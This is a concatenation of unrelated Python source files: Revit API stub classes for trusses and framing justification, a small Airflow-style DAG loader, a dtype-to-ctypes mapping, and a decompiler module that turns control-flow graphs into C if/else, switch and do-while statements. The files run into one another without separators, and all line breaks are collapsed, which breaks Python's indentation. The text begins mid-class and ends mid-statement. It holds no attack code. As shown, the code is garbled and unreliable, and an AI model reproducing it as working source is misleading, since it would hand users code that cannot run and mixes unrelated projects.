= None NonTrussCurve = None TopChord = None value__ = None Web = None class TrussMemberInfo(object): """ Provides access to the information of a truss member in Autodesk Revit. TrussMemberInfo() """ hostTrussId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host truss' ElementId of the member. Get: hostTrussId(self: TrussMemberInfo) -> ElementId Set: hostTrussId(self: TrussMemberInfo) = value """ lockedToTruss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether the member is locked to the host truss. Get: lockedToTruss(self: TrussMemberInfo) -> bool Set: lockedToTruss(self: TrussMemberInfo) = value """ memberTypeKey = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Kind of the member in the truss. Get: memberTypeKey(self: TrussMemberInfo) -> TrussMemberType Set: memberTypeKey(self: TrussMemberInfo) = value """ class TrussMemberType(Enum, IComparable, IFormattable, IConvertible): """ Indicates the "kind" of a truss member. enum TrussMemberType, values: ETK_TrussBottomChord (2), ETK_TrussDiagWeb (4), ETK_TrussTopChord (1), ETK_TrussVertWeb (3), ETK_Unknown (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ETK_TrussBottomChord = None ETK_TrussDiagWeb = None ETK_TrussTopChord = None ETK_TrussVertWeb = None ETK_Unknown = None value__ = None class TrussType(FamilySymbol, IDisposable): """ Represents a specific type of truss. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class WireDistributionDirection(Enum, IComparable, IFormattable, IConvertible): """ Defines the direction of the distribution of wires in a Fabric Sheet. enum WireDistributionDirection, values: Major (0), Minor (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Major = None Minor = None value__ = None class YJustification(Enum, IComparable, IFormattable, IConvertible): """ The justification of the framing element in Y. enum YJustification, values: Center (1), Left (0), Origin (2), Right (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Center = None Left = None Origin = None Right = None value__ = None class YZJustificationOption(Enum, IComparable, IFormattable, IConvertible): """ The option for whether a framing element has independent or uniform justification on its ends. enum YZJustificationOption, values: Independent (1), Uniform (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Independent = None Uniform = None value__ = None class ZJustification(Enum, IComparable, IFormattable, IConvertible): """ The justification of the framing element in Z. enum ZJustification, values: Bottom (3), Center (1), Origin (2), Top (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None Center = None Origin = None Top = None value__ = None # variables with complex values # Dummy file to load dynamic dags from dagen from dagen.utils import get_managed_dags for dag in get_managed_dags(): globals()[dag.dag_id] = dag 0 import ctypes class Int8: pass class Int16: pass class Int32: pass class Int64: pass class UInt8: pass class UInt16: pass class UInt32: pass class UInt64: pass class Float32: pass class Float64: pass class Bool: pass class Utf8: pass class LargeList: pass class Date32: pass class Date64: pass # Don't change the order of these! dtypes = [ Int8, Int16, Int32, Int64, UInt8, UInt16, UInt32, UInt64, Float32, Float64, Bool, Utf8, LargeList, Date32, Date64, ] DTYPE_TO_FFINAME = { Int8: "i8", Int16: "i16", Int32: "i32", Int64: "i64", UInt8: "u8", UInt16: "u16", UInt32: "u32", UInt64: "u64", Float32: "f32", Float64: "f64", Bool: "bool", Utf8: "str", LargeList: "largelist", Date32: "date32", Date64: "date64", } def dtype_to_ctype(dtype: "DataType") -> "ctype": if dtype == UInt8: ptr_type = ctypes.c_uint8 elif dtype == UInt16: ptr_type = ctypes.c_uint16 elif dtype == UInt32: ptr_type = ctypes.c_uint elif dtype == UInt64: ptr_type = ctypes.c_ulong elif dtype == Int8: ptr_type = ctypes.c_int8 elif dtype == Int16: ptr_type = ctypes.c_int16 elif dtype == Int32: ptr_type = ctypes.c_int elif dtype == Int64: ptr_type = ctypes.c_long elif dtype == Float32: ptr_type = ctypes.c_float elif dtype == Float64: ptr_type = ctypes.c_double elif dtype == Date32: ptr_type = ctypes.c_int elif dtype == Date64: ptr_type = ctypes.c_long else: return NotImplemented return ptr_type from collections import defaultdict from dataclasses import dataclass, field, replace from typing import Dict, List, Optional, Set, Tuple, Union from .flow_graph import ( BasicNode, ConditionalNode, FlowGraph, Node, ReturnNode, SwitchNode, TerminalNode, ) from .options import Options from .translate import ( BinaryOp, BlockInfo, CommaConditionExpr, Condition, Expression, Formatter, FunctionInfo, Statement as TrStatement, SwitchControl, format_expr, get_block_info, simplify_condition, ) from .types import Type @dataclass class Context: flow_graph: FlowGraph fmt: Formatter options: Options is_void: bool = True switch_nodes: Dict[SwitchNode, int] = field(default_factory=dict) case_nodes: Dict[Node, List[Tuple[int, str]]] = field( default_factory=lambda: defaultdict(list) ) goto_nodes: Set[Node] = field(default_factory=set) emitted_nodes: Set[Node] = field(default_factory=set) has_warned: bool = False @dataclass class IfElseStatement: condition: Condition if_body: "Body" else_body: Optional["Body"] = None def should_write(self) -> bool: return True def format(self, fmt: Formatter) -> str: space = fmt.indent("") condition = simplify_condition(self.condition) cond_str = format_expr(condition, fmt) after_ifelse = f"\n{space}" if fmt.coding_style.newline_after_if else " " before_else = f"\n{space}" if fmt.coding_style.newline_before_else else " " with fmt.indented(): if_str = "\n".join( [ f"{space}if ({cond_str}){after_ifelse}{{", self.if_body.format(fmt), # has its own indentation f"{space}}}", ] ) if self.else_body is not None and not self.else_body.is_empty(): sub_if = self.else_body.get_lone_if_statement() if sub_if: sub_if_str = sub_if.format(fmt).lstrip() else_str = f"{before_else}else {sub_if_str}" else: with fmt.indented(): else_str = "\n".join( [ f"{before_else}else{after_ifelse}{{", self.else_body.format(fmt), f"{space}}}", ] ) if_str = if_str + else_str return if_str @dataclass class SwitchStatement: jump: SwitchControl body: "Body" # If there are multiple switch statements in a single function, each is given a # unique index starting at 1. This is used in comments to make control flow clear. index: int def should_write(self) -> bool: return True def format(self, fmt: Formatter) -> str: lines = [] comments = [] body_is_empty = self.body.is_empty() if self.index > 0: comments.append(f"switch {self.index}") if not self.jump.jump_table: comments.append("unable to parse jump table") elif body_is_empty: comments.append(f"jump table: {self.jump.jump_table.symbol_name}") suffix = ";" if body_is_empty else " {" lines.append( fmt.with_comments( f"switch ({format_expr(self.jump.control_expr, fmt)}){suffix}", comments ) ) if not body_is_empty: with fmt.indented(): lines.append(self.body.format(fmt)) lines.append(fmt.indent("}")) return "\n".join(lines) @dataclass class SimpleStatement: contents: Optional[Union[str, TrStatement]] comment: Optional[str] = None is_jump: bool = False def should_write(self) -> bool: return self.contents is not None or self.comment is not None def format(self, fmt: Formatter) -> str: if self.contents is None: content = "" elif isinstance(self.contents, str): content = self.contents else: content = self.contents.format(fmt) if self.comment is not None: comments = [self.comment] else: comments = [] return fmt.with_comments(content, comments) def clear(self) -> None: self.contents = None self.comment = None @dataclass class LabelStatement: context: Context node: Node def should_write(self) -> bool: return ( self.node in self.context.goto_nodes or self.node in self.context.case_nodes ) def format(self, fmt: Formatter) -> str: lines = [] if self.node in self.context.case_nodes: for (switch, case_label) in self.context.case_nodes[self.node]: comments = [f"switch {switch}"] if switch != 0 else [] lines.append(fmt.with_comments(f"{case_label}:", comments, indent=-1)) if self.node in self.context.goto_nodes: lines.append(f"{label_for_node(self.context, self.node)}:") return "\n".join(lines) @dataclass class DoWhileLoop: body: "Body" condition: Condition def should_write(self) -> bool: return True def format(self, fmt: Formatter) -> str: space = fmt.indent("") after_do = f"\n{space}" if fmt.coding_style.newline_after_if else " " cond = format_expr(simplify_condition(self.condition), fmt) with fmt.indented(): return "\n".join( [ f"{space}do{after_do}{{", self.body.format(fmt), f"{space}}} while ({cond});", ] ) Statement = Union[ SimpleStatement, IfElseStatement, LabelStatement, SwitchStatement, DoWhileLoop, ] @dataclass class Body: print_node_comment: bool statements: List[Statement] = field(default_factory=list) def extend(self, other: "Body") -> None: """Add the contents of `other` into ourselves""" self.print_node_comment |= other.print_node_comment self.statements.extend(other.statements) def add_node(self, node: Node, comment_empty: bool) -> None: block_info = get_block_info(node) statements = block_info.statements_to_write() # Add node header comment if self.print_node_comment and (statements or comment_empty): self.add_comment(f"Node {node.name()}") # Add node contents for item in statements: self.statements.append(SimpleStatement(item)) def add_statement(self, statement: Statement) -> None: self.statements.append(statement) def add_comment(self, contents: str) -> None: self.add_statement(SimpleStatement(None, comment=contents)) def add_if_else(self, if_else: IfElseStatement) -> None: if if_else.if_body.ends_in_jump(): # Transform `if (A) { B; return C; } else { D; }` # into `if (A) { B; return C; } D;`, # which reduces indentation to make the output more readable self.statements.append(replace(if_else, else_body=None)) if if_else.else_body is not None: self.extend(if_else.else_body) return self.statements.append(if_else) def add_do_while_loop(self, do_while_loop: DoWhileLoop) -> None: self.statements.append(do_while_loop) def add_switch(self, switch: SwitchStatement) -> None: self.add_statement(switch) def is_empty(self) -> bool: return not any(statement.should_write() for statement in self.statements) def ends_in_jump(self) -> bool: """ Returns True if the body ends in an unconditional jump (`goto` or `return`), which may allow for some syntax transformations. For example, this is True for bodies ending in a ReturnNode, because `return ...;` statements are marked with is_jump. This function is conservative: it only returns True if we're *sure* if the control flow won't continue past the Body boundary. """ for statement in self.statements[::-1]: if not statement.should_write(): continue return isinstance(statement, SimpleStatement) and statement.is_jump return False def get_lone_if_statement(self) -> Optional[IfElseStatement]: """If the body consists solely of one IfElseStatement, return it, else None.""" ret: Optional[IfElseStatement] = None for statement in self.statements: if statement.should_write(): if not isinstance(statement, IfElseStatement) or ret: return None ret = statement return ret def elide_empty_returns(self) -> None: """Remove `return;` statements from the end of the body. If the final statement is an if-else block, recurse into it.""" for statement in self.statements[::-1]: if ( isinstance(statement, SimpleStatement) and statement.contents == "return;" ): statement.clear() if not statement.should_write(): continue if isinstance(statement, IfElseStatement): statement.if_body.elide_empty_returns() if statement.else_body is not None: statement.else_body.elide_empty_returns() # We could also do this to SwitchStatements, but the generally # preferred style is to keep the final return/break break def format(self, fmt: Formatter) -> str: return "\n".join( statement.format(fmt) for statement in self.statements if statement.should_write() ) def label_for_node(context: Context, node: Node) -> str: if node.loop: return f"loop_{node.block.index}" else: return f"block_{node.block.index}" def emit_node(context: Context, node: Node, body: Body) -> bool: """ Try to emit a node for the first time, together with a label for it. The label is only printed if something jumps to it, e.g. a loop. For return nodes, it's preferred to emit multiple copies, rather than goto'ing a single return statement. For other nodes that were already emitted, instead emit a goto. Since nodes represent positions in assembly, and we use phi's for preserved variable contents, this will end up semantically equivalent. This can happen sometimes when early returns/continues/|| are not detected correctly, and this hints at that situation better than if we just blindly duplicate the block """ if node in context.emitted_nodes: # TODO: Treating ReturnNode as a special case and emitting it repeatedly # hides the fact that we failed to fold the control flow. Maybe remove? if not isinstance(node, ReturnNode): emit_goto(context, node, body) return False else: body.add_comment( f"Duplicate return node #{node.name()}. Try simplifying control flow for better match" ) else: body.add_statement(LabelStatement(context, node)) context.emitted_nodes.add(node) body.add_node(node, comment_empty=True) if isinstance(node, ReturnNode): emit_return(context, node, body) return True def emit_goto(context: Context, target: Node, body: Body) -> None: assert not isinstance(target, TerminalNode), "cannot goto a TerminalNode" label = label_for_node(context, target) context.goto_nodes.add(target) body.add_statement(SimpleStatement(f"goto {label};", is_jump=True)) def add_labels_for_switch( context: Context, node: SwitchNode, default_node: Optional[Node] ) -> int: assert node.cases, "jtbl list must not be empty" switch_index = context.switch_nodes[node] # Determine offset offset = 0 switch_control = get_block_info(node).switch_control if isinstance(switch_control, SwitchControl): offset = switch_control.offset # Force hex for case labels if the highest label is above 50, and there are no negative labels use_hex = context.fmt.coding_style.hex_case or ( offset >= 0 and (len(node.cases) + offset) > 50 ) # Mark which labels we need to emit if default_node is not None: # `None` is a sentinel value to mark the `default:` block context.case_nodes[default_node].append((switch_index, "default")) for index, target in enumerate(node.cases): # Do not emit extra `case N:` labels for the `default:` block if target == default_node: continue # Do not emit labels that skip the switch block entirely if target == node.immediate_postdominator: continue case_num = index + offset case_label = f"case 0x{case_num:X}" if use_hex else f"case {case_num}" context.case_nodes[target].append((switch_index, case_label)) return switch_index def is_switch_guard(node: Node) -> bool: """Return True if `node` is a ConditionalNode for checking the bounds of a SwitchNode's control expression. These can usually be combined in the output.""" if not isinstance(node, ConditionalNode): return False cond = get_block_info(node).branch_condition assert cond is not None switch_node = node.fallthrough_edge if not isinstance(switch_node, SwitchNode): return False switch_block_info = get_block_info(switch_node) assert switch_block_info.switch_control is not None # The SwitchNode must have no statements, and the conditional # from the ConditionalNode must properly check the jump table bounds. return ( switch_node.parents == [node] and not switch_block_info.statements_to_write() and switch_block_info.switch_control.matches_guard_condition(cond) ) def gather_any_comma_conditions(block_info: BlockInfo) -> Condition: branch_condition = block_info.branch_condition assert branch_condition is not None comma_statements = block_info.statements_to_write() if comma_statements: assert not isinstance(branch_condition, CommaConditionExpr) return CommaConditionExpr(comma_statements, branch_condition) else: return branch_condition def try_make_if_condition( chained_cond_nodes: List[ConditionalNode], end: Node ) -> Optional[Tuple[Condition, Node, Optional[Node]]]: """ Try to express the nodes in `chained_cond_nodes` as a single `Condition` `cond` to make an if-else statement. `end` is the immediate postdominator of the first node in `chained_cond_nodes`, and is the node following the if-else statement. Returns a tuple of `(cond, if_node, else_node)` representing: ``` if (cond) { goto if_node; } else { goto else_node; } ``` If `else_node` is `None`, then the else block is empty and can be omitted. This function returns `None` if the topology of `chained_cond_nodes` cannot be represented by a single `Condition`. It also returns `None` if `cond` has an outermost && expression with a `CommaConditionExpr`: these are better represented as nested if statements. """ start_node = chained_cond_nodes[0] if_node = chained_cond_nodes[-1].fallthrough_edge else_node: Optional[Node] = chained_cond_nodes[-1].conditional_edge assert else_node is not None # Check that all edges point "forward" to other nodes in the if statement # and translate this DAG of nodes into a dict we can easily modify allowed_nodes = set(chained_cond_nodes) | {if_node, else_node} node_cond_edges: Dict[ConditionalNode, Tuple[Condition, Node, Node]] = {} for node in chained_cond_nodes: if ( node.conditional_edge not in allowed_nodes or node.fallthrough_edge not in allowed_nodes ): # Not a valid set of chained_cond_nodes return None allowed_nodes.remove(node) block_info = get_block_info(node) if node is start_node: # The first condition in an if-statement will have unrelated # statements in its to_write list, which our caller will already # have emitted. Avoid emitting them twice. cond = block_info.branch_condition assert isinstance(cond, Condition) else: # Otherwise, these statements will be added to the condition cond = gather_any_comma_conditions(block_info) node_cond_edges[node] = (cond, node.conditional_edge, node.fallthrough_edge) # Iteratively (try to) reduce the nodes into a single condition # # This is done through a process similar to "Rule T2" used in interval analysis # of control flow graphs, see ref. slides 17-21 of: # http://misailo.web.engr.illinois.edu/courses/526-sp17/lec1.pdf # # We have already ensured that all edges point forward (no loops), and there # are no incoming edges to internal nodes from outside the chain. # # Pick the first pair of nodes which form one of the 4 possible reducible # subgraphs, and then "collapse" them together by combining their conditions # and adjusting their edges. This process is repeated until no more changes # are possible, and is a success if there is exactly 1 condition left. while True: # Calculate the parents for each node in our subgraph node_parents: Dict[ConditionalNode, List[ConditionalNode]] = { node: [] for node in node_cond_edges } for node in node_cond_edges: for child in node_cond_edges[node][1:]: if child not in (if_node, else_node): assert isinstance(child, ConditionalNode) node_parents[child].append(node) # Find the first pair of nodes which form a reducible pair: one will always # be the *only* parent of the other. # Note: we do not include `if_node` or `else_node` in this search for child, parents in node_parents.items(): if len(parents) != 1: continue parent = parents[0] child_cond, child_if, child_else = node_cond_edges[child] parent_cond, parent_if, parent_else = node_cond_edges[parent] # The 4 reducible subgraphs, see ref. slides 21-22 of: # https://www2.cs.arizona.edu/~collberg/Teaching/553/2011/Resources/ximing-slides.pdf # In summary: # - The child must have exactly one incoming edge, from the parent # - The parent's other edge must be in common with one of the child's edges # - Replace the condition with a combined condition from the two nodes # - Replace the parent's edges with the child's edges if parent_if is child_if and parent_else is child: parent_else = child_else cond = join_conditions(parent_cond, "||", child_cond) elif parent_if is child_else and parent_else is child: parent_else = child_if cond = join_conditions(parent_cond, "||", child_cond.negated()) elif parent_if is child and parent_else is child_if: parent_if = child_else cond = join_conditions(parent_cond, "&&", child_cond.negated()) elif parent_if is child and parent_else is child_else: parent_if = child_if cond = join_conditions(parent_cond, "&&", child_cond) else: continue # Modify the graph by replacing `parent`'s condition/edges, and deleting `child` node_cond_edges[parent] = (cond, parent_if, parent_else) node_cond_edges.pop(child) break else: # No pair was found, we're done! break # Were we able to collapse all conditions from chained_cond_nodes into one? if len(node_cond_edges) != 1 or start_node not in node_cond_edges: return None cond, left_node, right_node = node_cond_edges[start_node] # Negate the condition if the if/else nodes are backwards if (left_node, right_node) == (else_node, if_node): cond = cond.negated() else: assert (left_node, right_node) == (if_node, else_node) # Check if the if/else needs an else block if else_node is end: else_node = None elif if_node is end: # This is rare, but re-write if/else statements with an empty if body # from `if (cond) {} else { else_node; }` into `if (!cond) { else_node; }` cond = cond.negated() if_node = else_node else_node = None # If there is no `else`, then check the conditions in the outermost `&&` expression. # Complex `&&` conditions are better represented with nested ifs. if else_node is None: c: Expression = cond while isinstance(c, BinaryOp) and c.op == "&&": if isinstance(c.right, CommaConditionExpr): # Fail, to try building a shorter conditional expression return None c = c.left return (cond, if_node, else_node) def build_conditional_subgraph( context: Context, start: ConditionalNode, end: Node ) -> IfElseStatement: """ Output the subgraph between `start` and `end`, including the branch condition in the ConditionalNode `start`. This function detects "plain" if conditions, as well as conditions containing nested && and || terms. As generated by IDO and GCC, conditions with && and || terms are emitted in a very particular way. There will be a "chain" ConditionalNodes, where each node falls through to the next node in the chain. Each conditional edge from the nodes in this chain will go to one of: - The head of the if block body (`if_node`) - The head of the else block body (`else_node`) - A *later* conditional node in the chain (no loops) We know IDO likes to emit the assembly for basic blocks in the same order that they appear in the C source. So, we generally call the fallthrough of the final ConditionNode the `if_node` (unless it is empty). By construction, it will be an earlier node than the `else_node`. """ # Find the longest fallthrough chain of ConditionalNodes. # This is the starting point for finding the complex &&/|| Condition # The conditional edges will be checked in later step curr_node: Node = start chained_cond_nodes: List[ConditionalNode] = [] while True: assert isinstance(curr_node, ConditionalNode) chained_cond_nodes.append(curr_node) curr_node = curr_node.fallthrough_edge if not ( # If &&/|| detection is disabled, then limit the condition to one node context.options.andor_detection # Only include ConditionalNodes and isinstance(curr_node, ConditionalNode) # Only include nodes that are postdominated by `end` and end in curr_node.postdominators # Exclude the `end` node and end is not curr_node # Exclude any loop nodes (except `start`) and not curr_node.loop # Exclude nodes with incoming edges that are not part of the condition and all(p in chained_cond_nodes for p in curr_node.parents) # Exclude guards for SwitchNodes (they may be elided) and not is_switch_guard(curr_node) ): break # We want to take the largest chain of ConditionalNodes that can be converted to # a single condition with &&'s and ||'s. We start with the largest chain computed # above, and then trim it until it meets this criteria. The resulting chain will # always have at least one node. while True: assert chained_cond_nodes cond_result = try_make_if_condition(chained_cond_nodes, end) if cond_result: break # Shorten the chain by removing the last node, then try again. chained_cond_nodes.pop() cond, if_node, else_node = cond_result # Mark nodes that may have comma expressions in `cond` as emitted context.emitted_nodes.update(chained_cond_nodes[1:]) # Build the if & else bodies else_body: Optional[Body] = None if else_node: else_body = build_flowgraph_between(context, else_node, end) if_body = build_flowgraph_between(context, if_node, end) return IfElseStatement(cond, if_body, else_body) def join_conditions(left: Condition, op: str, right: Condition) -> Condition: assert op in ["&&", "||"] return BinaryOp(left, op, right, type=Type.bool()) def emit_return(context: Context, node: ReturnNode, body: Body) -> None: ret_info = get_block_info(node) ret = ret_info.return_value if ret is not None: ret_str = format_expr(ret, context.fmt) body.add_statement(SimpleStatement(f"return {ret_str};", is_jump=True)) context.is_void = False else: body.add_statement(SimpleStatement("return;", is_jump=True)) def build_switch_between( context: Context, switch: SwitchNode, default: Optional[Node], end: Node, ) -> SwitchStatement: """ Output the subgraph between `switch` and `end`, but not including `end`. The returned SwitchStatement starts with the jump to the switch's value. """ switch_cases = switch.cases[:] if default is end: default = None elif default is not None: switch_cases.append(default) switch_index = add_labels_for_switch(context, switch, default) jump = get_block_info(switch).switch_control assert jump is not None switch_body = Body(print_node_comment=context.options.debug) # Order case blocks by their position in the asm, not by their order in the jump table # (but use the order in the jump table to break ties) sorted_cases = sorted( set(switch_cases), key=lambda node: (node.block.index, switch_cases.index(node)) ) next_sorted_cases: List[Optional[Node]] = [] next_sorted_cases.extend(sorted_cases[1:]) next_sorted_cases.append(None) for case, next_case in zip(sorted_cases, next_sorted_cases): if case in context.emitted_nodes or case is end: pass elif ( next_case is not None and next_case not in context.emitted_nodes and next_case is not end and next_case in case.postdominators ): switch_body.extend(build_flowgraph_between(context, case, next_case)) if not switch_body.ends_in_jump(): switch_body.add_comment(f"fallthrough") else: switch_body.extend(build_flowgraph_between(context, case, end)) if not switch_body.ends_in_jump(): switch_body.add_statement(SimpleStatement("break;", is_jump=True)) return SwitchStatement(jump, switch_body, switch_index) def detect_loop(context: Context, start: Node, end: Node) -> Optional[DoWhileLoop]: assert start.loop # Find the the condition for the do-while, if it exists condition: Optional[Condition] = None for node in start.loop.backedges: if ( node in start.postdominators and isinstance(node, ConditionalNode) and node.fallthrough_edge == end ): block_info = get_block_info(node) assert block_info.branch_condition is not None condition = block_info.branch_condition new_end = node break if not condition: return None loop_body = build_flowgraph_between( context, start, new_end, skip_loop_detection=True, ) emit_node(context, new_end, loop_body) return DoWhileLoop(loop_body, condition) def build_flowgraph_between( context: Context, start: Node, end: Node, skip_loop_detection: bool = False ) -> Body: """ Output a section of a flow graph that has already been translated to our symbolic AST. All nodes between start and end, including start but NOT end, will be printed out using if-else statements and block info. `skip_loop_detection` is used to prevent infinite recursion, since (in the case of loops) this function can be recursively called by itself (via `detect_loop`) with the same `start` argument. """ curr_start: Node = start body = Body(print_node_comment=context.options.debug) # We will split this graph into subgraphs, where the entrance and exit nodes # of that subgraph are at the same indentation level. "curr_start" will # iterate through these nodes by taking the immediate postdominators, # which are commonly referred to as articulation nodes. while curr_start != end: assert not isinstance(curr_start, TerminalNode) if ( not skip_loop_detection and curr_start.loop and not curr_start in context.emitted_nodes ): # Find the immediate postdominator to the whole loop, # i.e. the first node outside the loop body imm_pdom: Node = curr_start while imm_pdom in curr_start.loop.nodes: assert imm_pdom.immediate_postdominator is not None imm_pdom = imm_pdom.immediate_postdominator # Construct the do-while loop do_while_loop = detect_loop(context, curr_start, imm_pdom) if do_while_loop: body.add_do_while_loop(do_while_loop) # Move on. curr_start = imm_pdom continue # Write the current node, or a goto, to the body if not emit_node(context, curr_start, body): # If the node was already witten, emit_node will use a goto # and return False. After the jump, there control flow will # continue from there (hopefully hitting `end`!) break if curr_start.emit_goto: # If we have decided to emit a goto here, then we should just fall # through to the next node by index, after writing a goto. emit_goto(context, curr_start, body) # Advance to the next node in block order. This may skip over # unreachable blocks -- hopefully none too important. index = context.flow_graph.nodes.index(curr_start) fallthrough = context.flow_graph.nodes[index + 1] if isinstance(curr_start, ConditionalNode): assert fallthrough == curr_start.fallthrough_edge curr_start = fallthrough continue # The interval to process is [curr_start, curr_start.immediate_postdominator) curr_end = curr_start.immediate_postdominator assert curr_end is not None # For nodes with branches, curr_end is not a direct successor of curr_start if is_switch_guard(curr_start): # curr_start is a ConditionalNode that falls through to a SwitchNode, # where the condition checks that the switch's control expression is # within the jump table bounds. # We can combine the if+switch into just a single switch block. assert isinstance(curr_start, ConditionalNode), "checked by is_switch_guard" switch_node = curr_start.fallthrough_edge assert isinstance(switch_node, SwitchNode), "checked by is_switch_guard" default_node = curr_start.conditional_edge # is_switch_guard checked that switch_node has no statements to write, # so it is OK to mark it as emitted context.emitted_nodes.add(switch_node) if curr_end is switch_node: curr_end = switch_node.immediate_postdominator assert curr_end in curr_start.postdominators body.add_switch( build_switch_between(context, switch_node, default_node, curr_end) ) elif isinstance(curr_start, SwitchNode): body.add_switch(build_switch_between(context, curr_start, None, curr_end)) elif isinstance(curr_start, ConditionalNode): body.add_if_else(build_conditional_subgraph(context, curr_start, curr_end)) elif ( isinstance(curr_start, BasicNode) and curr_start.fake_successor == curr_end ): curr_end = curr_start.successor else: # No branch, but double check that we didn't skip any nodes. # If the check fails, then the immediate_postdominator computation was wrong assert curr_start.children() == [curr_end], ( f"While emitting flowgraph between {start.name()}:{end.name()}, " f"skipped nodes while stepping from {curr_start.name()} to {curr_end.name()}." ) # Move on. curr_start = curr_end return body def build_naive(context: Context, nodes: List[Node]) -> Body: """Naive procedure for generating output with only gotos for control flow. Used for --no-ifs, when the regular if_statements code fails.""" body = Body(print_node_comment=context.options.debug) def emit_goto_or_early_return(node: Node, body: Body) -> None: if isinstance(node, ReturnNode) and not node.is_real(): emit_node(context, node, body) else: emit_goto(context, node, body) def emit_successor(node: Node, cur_index: int) -> None: if ( cur_index + 1 < len(nodes) and nodes[cur_index + 1] == node and not (isinstance(node, ReturnNode) and not node.is_real()) ): # Fallthrough is fine return emit_goto_or_early_return(node, body) for i, node in enumerate(nodes): if isinstance(node, ReturnNode): # Do not emit duplicated (non-real) return nodes; they don't have # a well-defined position, so we emit them next to where they are # jumped to instead. if node.is_real(): emit_node(context, node, body) elif isinstance(node, BasicNode): emit_node(context, node, body) emit_successor(node.successor, i) elif isinstance(node, SwitchNode): index = add_labels_for_switch(context, node, None) emit_node(context, node, body) jump = get_block_info(node).switch_control assert jump is not None body.add_switch( SwitchStatement( jump=jump, body=Body(print_node_comment=False), index=index, ) ) elif isinstance(node, ConditionalNode): emit_node(context, node, body) if_body = Body(print_node_comment=True) emit_goto_or_early_return(node.conditional_edge, if_body) block_info = get_block_info(node) assert block_info.branch_condition is not None body.add_if_else( IfElseStatement( block_info.branch_condition, if_body=if_body, else_body=None, ) ) emit_successor(node.fallthrough_edge, i) else: assert isinstance(node, TerminalNode) return body def build_body(context: Context, options: Options) -> Body: start_node: Node = context.flow_graph.entry_node() terminal_node: Node = 